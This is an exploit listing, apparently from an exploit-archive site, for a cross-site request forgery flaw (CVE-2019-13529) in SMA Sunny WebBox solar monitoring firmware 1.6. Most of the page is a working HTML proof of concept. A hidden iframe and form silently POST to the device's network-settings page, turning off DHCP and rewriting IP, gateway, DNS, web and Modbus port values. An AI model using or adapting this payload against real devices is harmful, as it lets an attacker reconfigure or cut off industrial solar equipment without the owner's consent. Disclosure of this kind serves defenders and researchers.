SMA Solar Technology AG Sunny WebBox 1.6 Cross Site Request Forgery

SMA Solar Technology AG Sunny WebBox device version 1.6 suffers from a cross site request forgery vulnerability.

MD5 | 5c250dd472b09481d04ded8dbb3c8eef

# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
# Date: 2019-10-08
# Exploit Author: Borja Merino and Eduardo Villaverde
# Vendor Homepage:
# Version: Firmware Version 1.6 and prior
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
# CVE : CVE-2019-13529
# ICS-Cert Advisory:

<!-- Change any hidden value -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
<input type='hidden' name='RadioButtonDhcp' value='off'>
<input type='hidden' name='IpAddr' value=''>
<input type='hidden' name='SubnetMask' value=''>
<input type='hidden' name='Gateway' value=''>
<input type='hidden' name='DnsIpAddr' value=''>
<input type='hidden' name='Dns2IpAddr' value=''>
<input type='hidden' name='StaticNatPortHttp' value='80'>
<input type='hidden' name='WebserverPort' value='80'>
<input type='hidden' name='WebservicePort' value='80'>
<input type='hidden' name='RadioButtonModbus' value='off'>
<input type='hidden' name='ModbusPort' value='502'>
<input type='hidden' name='BConfirm' value='Confirmar'>
<input type='submit' value='submit'>

Related Posts